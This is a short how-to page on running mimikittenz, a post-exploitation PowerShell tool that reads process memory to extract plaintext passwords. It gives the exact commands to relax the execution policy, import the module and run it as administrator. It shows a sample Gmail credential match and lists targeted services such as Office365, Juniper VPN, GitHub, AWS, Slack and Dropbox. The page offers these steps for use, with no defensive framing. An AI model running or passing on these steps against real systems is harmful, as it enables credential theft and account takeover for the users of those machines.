Extract passwords and more from memory #

mimikittenz "is a post-exploitation powershell tool that utilizes the Windows function ReadProcessMemory() in order to extract plain-text passwords from various target processes".

Basic usage:

Run Windows PowerShell as administrator
cd to directory containing Invoke-mimikittenz.ps1 (e.g., Downloads)
PS C:\Users\user\Downloads> Set-ExecutionPolicy RemoteSigned
PS C:\Users\user\Downloads> Import-Module $pwd\Invoke-mimikittenz.ps1
PS C:\Users\user\Downloads> Invoke-mimikittenz

Sample result:

PatternName       PatternMatch
-----------       ------------
Gmail             &[email protected]&Passwd=PASSWORD_IN_PLAINTEXT&Persiste...

mimikittenz currently extracts the following credentials from memory:

Webmail
- Gmail
- Office365
- Outlook Web
Accounting
- Xero
- MYOB
Remote Access
- Juniper SSL-VPN
- Citrix NetScaler
- Remote Desktop Web Access 2012
Development
- Jira
- Github
- Bugzilla
- Zendesk
- Cpanel
IHateReverseEngineers
- Malwr
- VirusTotal
- AnubisLabs
Misc
- Dropbox
- Microsoft Onedrive
- AWS Web Services
- Slack
- Twitter
- Facebook